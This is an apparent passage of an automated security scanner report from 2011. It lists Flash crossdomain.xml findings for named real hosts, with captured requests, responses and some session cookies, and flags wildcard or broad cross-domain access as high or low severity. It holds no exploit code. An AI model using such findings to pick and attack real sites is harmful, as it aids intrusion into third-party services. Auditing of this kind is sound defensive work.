Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: cdn.static.viddler.com
Proxy-Connection: keep-alive
Referer: http://www.viddler.com/player/cc4ac375/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=31536000
Content-Type: application/xml
Date: Thu, 08 Sep 2011 19:54:06 GMT
ETag: "80713937-4d-476833f70e800"
Expires: Fri, 07 Sep 2012 19:54:06 GMT
Last-Modified: Thu, 22 Oct 2009 10:06:24 GMT
Server: ECAcc (sjo/52D4)
X-Cache: HIT
Content-Length: 77

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

3.5. http://cdnimages.sorensonmedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdnimages.sorensonmedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: cdnimages.sorensonmedia.com
Proxy-Connection: keep-alive
Referer: http://static.cdn.360.sorensonmedia.com/1/flash/flowplayer-3.2.2.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
x-amz-id-2: sDeROQsMjQ2Sd0WeMW+UC0oGczf23hsqoQVOxMS+bhFZJ5YbvB+SqQPABNsO7Z2y
x-amz-request-id: 0702A883BB175FCB
Date: Mon, 11 Oct 2010 17:53:49 GMT
x-amz-meta-s3fox-filesize: 313
x-amz-meta-s3fox-modifiedtime: 1231976316000
Last-Modified: Wed, 14 Jan 2009 23:40:33 GMT
ETag: "b39e4db0d6aa6090a0d17f1290bff7d5"
Content-Type: text/xml
Content-Length: 313
Server: AmazonS3
Age: 53872
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 3bf7fc6bfca28e69bd9ccec9701beaf2b3451b3411c94eb8ef269cd86f0393a7783dcd1f54cad24a
Via: 1.0 2ba8d32c0ef1d73da2fcae191d906606.cloudfront.net:11180 (CloudFront), 1.0 1cc1afd17178a6b946be07884b15a828.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*" />
...[SNIP]...

3.6. http://cdnvideos.sorensonmedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdnvideos.sorensonmedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdnvideos.sorensonmedia.com

Response

HTTP/1.0 200 OK
x-amz-id-2: 0HsrfCqJbLuvI3RCfYSZirgisWVRwczDCJmmLfnL3nSP5uN5vM7A4q5s+ZUB4osX
x-amz-request-id: 94CFB287B85B25E8
Date: Thu, 08 Sep 2011 11:40:45 GMT
x-amz-meta-s3fox-filesize: 313
x-amz-meta-s3fox-modifiedtime: 1231976316000
Last-Modified: Wed, 14 Jan 2009 23:40:15 GMT
ETag: "b39e4db0d6aa6090a0d17f1290bff7d5"
Accept-Ranges: bytes
Content-Type: text/xml
Content-Length: 313
Server: AmazonS3
Age: 27847
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 350ac25352d701a209c003b8f2ba58964aca81ac86012a4ff7d91915f7e078061666933e03e0b14e,2703e321deb7d4cf60a40f2535426cc4fc816364da3c1a432f02fc2dfec343049b293a2cfd7e1297
Via: 1.0 2ba8d32c0ef1d73da2fcae191d906606.cloudfront.net:11180 (CloudFront), 1.0 5e67960ca17a2cc60393e082766a7dca.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*" />
...[SNIP]...

3.7. http://load.tubemogul.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://load.tubemogul.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: load.tubemogul.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"-1-1315508610000"
Last-Modified: Thu, 08 Sep 2011 19:03:30 GMT
host: rcv-srv07
Content-Type: application/xml
Content-Length: 204
Date: Thu, 08 Sep 2011 19:54:07 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

3.8. http://optionsxpress.tt.omtrdc.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://optionsxpress.tt.omtrdc.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: optionsxpress.tt.omtrdc.net

Response

HTTP/1.1 200 OK
Server: Test & Target
Content-Type: application/xml
Date: Thu, 08 Sep 2011 19:24:42 GMT
Accept-Ranges: bytes
ETag: W/"201-1313024241000"
Connection: close
Last-Modified: Thu, 11 Aug 2011 00:57:21 GMT
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

...[SNIP]...

3.9. http://pixel.everesttech.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.everesttech.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.everesttech.net

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:24:37 GMT
Server: Apache
Last-Modified: Tue, 22 Mar 2011 22:39:33 GMT
ETag: "1b8839-cb-49f19eb07d340"
Accept-Ranges: bytes
Content-Length: 203
Keep-Alive: timeout=15, max=996383
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

3.10. http://rcv-srv20.inplay.tubemogul.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rcv-srv20.inplay.tubemogul.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: rcv-srv20.inplay.tubemogul.com
Proxy-Connection: keep-alive
Referer: http://www.viddler.com/player/cc4ac375/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tmid=-5675633421699857517; _tmpd=MjAxMTA5MDg_ODpzZWdtZW50PTAwMCZ6aXA9JmFnZT0mZ2VuZGVyPTozMA

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"-1-1313434781000"
Last-Modified: Mon, 15 Aug 2011 18:59:41 GMT
host: rcv-srv20
Content-Type: application/xml
Content-Length: 204
Date: Thu, 08 Sep 2011 19:54:08 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

3.11. http://receive.inplay.tubemogul.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://receive.inplay.tubemogul.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: receive.inplay.tubemogul.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"-1-1315510431000"
Last-Modified: Thu, 08 Sep 2011 19:33:51 GMT
host: rcv-srv38
Content-Type: application/xml
Content-Length: 204
Date: Thu, 08 Sep 2011 19:54:08 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

3.12. http://static.cdn.360.sorensonmedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.cdn.360.sorensonmedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: static.cdn.360.sorensonmedia.com

Response

HTTP/1.0 200 OK
x-amz-id-2: RXfGVT9cLpTqhhG/HfFmo1cNi8UJoJ7sFtzuon+SEBgIRFG9frHy42kN/hN4JrdG
x-amz-request-id: C5CD88AE7D85895F
Date: Thu, 08 Sep 2011 19:24:48 GMT
x-amz-meta-s3fox-filesize: 317
x-amz-meta-s3fox-modifiedtime: 1279214893000
Last-Modified: Mon, 18 Apr 2011 21:48:45 GMT
ETag: "e679a59ab5eb9e4ae17bb27c2114ba65"
Accept-Ranges: bytes
Content-Type: text/xml
Content-Length: 317
Server: AmazonS3
X-Cache: Miss from cloudfront
X-Amz-Cf-Id: 01a2486a203ad03356e09d8c4b97ccdb149f3b0be35d0c3894750347b49b0fcfbbb1acc00214275d,69dd733dc3aa3668c51a9c23447b6fa409ab08e7f822d6824e26a1fa5d5765b3b2a7666977ff41f7
Via: 1.0 c36847c5252e758d61b94a1d396be659.cloudfront.net:11180 (CloudFront), 1.0 9f619df210e737c1479674b741ae9bf5.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
   xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*" />
...[SNIP]...

3.13. http://stats.optionsxpress.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://stats.optionsxpress.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: stats.optionsxpress.com

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:24:49 GMT
Server: Omniture DC/2.0.0
xserver: www380
Content-Length: 137
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

3.14. http://tags.bluekai.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tags.bluekai.com

Response

HTTP/1.0 200 OK
Date: Thu, 08 Sep 2011 19:54:11 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 29 Jun 2011 21:44:06 GMT
ETag: "1d83ce-ca-4a6e0af03f580"
Accept-Ranges: bytes
Content-Length: 202
Content-Type: text/xml
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" to-ports="*"/>
<site-control permitted-cross-domain-policies="all"/>
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy
...[SNIP]...

3.15. http://www.viddler.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.viddler.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: www.viddler.com
Proxy-Connection: keep-alive
Referer: http://www.viddler.com/player/cc4ac375/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=C107179E6A4AB982596822DF0ABF8296.viddler_a

Response

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Thu, 08 Sep 2011 19:54:08 GMT
Content-Type: application/xml
Connection: keep-alive
X-Viddler-Node: viddler_a
Accept-Ranges: bytes
ETag: W/"80-1311663400000"
Last-Modified: Tue, 26 Jul 2011 06:56:40 GMT
Content-Length: 80

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

3.16. http://206.106.137.34/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://206.106.137.34
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.1
Host: 206.106.137.34
Proxy-Connection: keep-alive
Referer: http://www.interactivebrokers.com/images/flash/forexTicker_splash_wide.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:37:54 GMT
Server: Apache
Last-Modified: Tue, 14 Sep 2010 18:07:25 GMT
ETag: "2a6ac2-503-15cc7140"
Accept-Ranges: bytes
Content-Length: 1283
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.interactivebrokers.co.uk" />
<allow-access-from domain="*.interactivebrokers.com" />
<allow-access-from domain="*.interactivebrokers.ca" />
<allow-access-from domain="*.interactivebrokers.de" />
<allow-access-from domain="*.interactivebrokers.com.hk" />
<allow-access-from domain="*.global-view.com" />
<allow-access-from domain="*.fxstreet.com" />
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="*.wsj.com" />
<allow-access-from domain="*.ft.com" />
<allow-access-from domain="*.e-forex.net" />
<allow-access-from domain="*.hk.quamnet.com" />
<allow-access-from domain="*.finet.hk" />
<allow-access-from domain="*.etnet.com.hk" />
<allow-access-from domain="*.discuss.com.hk" />
<allow-access-from domain="*.e-finet.com" />
<allow-access-from domain="*.actionforex.com" />
<allow-access-from domain="*.forexcenter.net" />
<allow-access-from domain="*.actionforex.net" />
<allow-access-from domain="*.profit-loss.com" />
<allow-access-from domain="*.eyereturn.com" />
<allow-access-from domain="*.atdmt.com" />
<allow-access-from domain="*.wwwibtradersu.com" />
...[SNIP]...

3.17. http://adadvisor.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://adadvisor.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: adadvisor.net

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:54:08 GMT
Connection: close
Server: AAWebServer
P3P: policyref="http://www.adadvisor.net/w3c/p3p.xml",CP="NOI NID"
Content-Length: 478
Content-Type: Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="
...[SNIP]...
<allow-access-from domain="*.tubemogul.com" />
...[SNIP]...
<allow-access-from domain="*.adap.tv" />
...[SNIP]...
<allow-access-from domain="*.videoegg.com" />
...[SNIP]...
<allow-access-from domain="*.tidaltv.com" />
...[SNIP]...

3.18. https://adwords.google.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://adwords.google.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: adwords.google.com

Response

HTTP/1.0 200 OK
Expires: Fri, 09 Sep 2011 19:08:19 GMT
Date: Thu, 08 Sep 2011 19:08:19 GMT
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400
Age: 2220

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

3.19. http://finance.yahoo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://finance.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: finance.yahoo.com

Response

HTTP/1.0 200 OK
Date: Thu, 08 Sep 2011 19:46:52 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Thu, 05 Jun 2008 01:38:47 GMT
Accept-Ranges: bytes
Content-Length: 161
Vary: Accept-Encoding
Content-Type: application/xml
Age: 0
Server: YTS/1.20.7

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="us.js2.yimg.com" />
</cross-domain-policy>

3.20. http://picasaweb.google.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://picasaweb.google.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: picasaweb.google.com

Response

HTTP/1.0 200 OK
Expires: Fri, 09 Sep 2011 19:45:22 GMT
Date: Thu, 08 Sep 2011 19:45:22 GMT
Cache-Control: public, max-age=86400
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.ru" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.co.th" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.bg" />
<allow-access-from domain="*.google.hr" />
<allow-access-from domain="*.google.cz" />
<allow-access-from domain="*.google.gr" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.hu" />
<allow-access-from domain="*.google.co.id" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.google.si" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.fr" />
...[SNIP]...

3.21. http://server.iad.liveperson.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://server.iad.liveperson.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: server.iad.liveperson.net

Response

HTTP/1.1 200 OK
Content-Length: 526
Content-Type: text/xml
Content-Location: http://server.iad.liveperson.net/crossdomain.xml
Last-Modified: Thu, 23 Oct 2008 22:13:48 GMT
Accept-Ranges: bytes
ETag: "076249f5c35c91:2773"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Date: Thu, 08 Sep 2011 19:45:21 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"
...[SNIP]...
<allow-access-from domain="*.neogames-tech.com" secure="false" />
...[SNIP]...
<allow-access-from domain="secure.neogames-tech.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.qa.neogames-tech.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.st.neogames-tech.com" secure="false"/>
...[SNIP]...

3.22. https://server.iad.liveperson.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://server.iad.liveperson.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: server.iad.liveperson.net

Response

HTTP/1.1 200 OK
Content-Length: 526
Content-Type: text/xml
Content-Location: https://server.iad.liveperson.net/crossdomain.xml
Last-Modified: Thu, 23 Oct 2008 22:13:48 GMT
Accept-Ranges: bytes
ETag: "076249f5c35c91:2b2b"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Date: Thu, 08 Sep 2011 19:46:58 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"
...[SNIP]...
<allow-access-from domain="*.neogames-tech.com" secure="false" />
...[SNIP]...
<allow-access-from domain="secure.neogames-tech.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.qa.neogames-tech.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.st.neogames-tech.com" secure="false"/>
...[SNIP]...

3.23. http://us.rd.yahoo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://us.rd.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

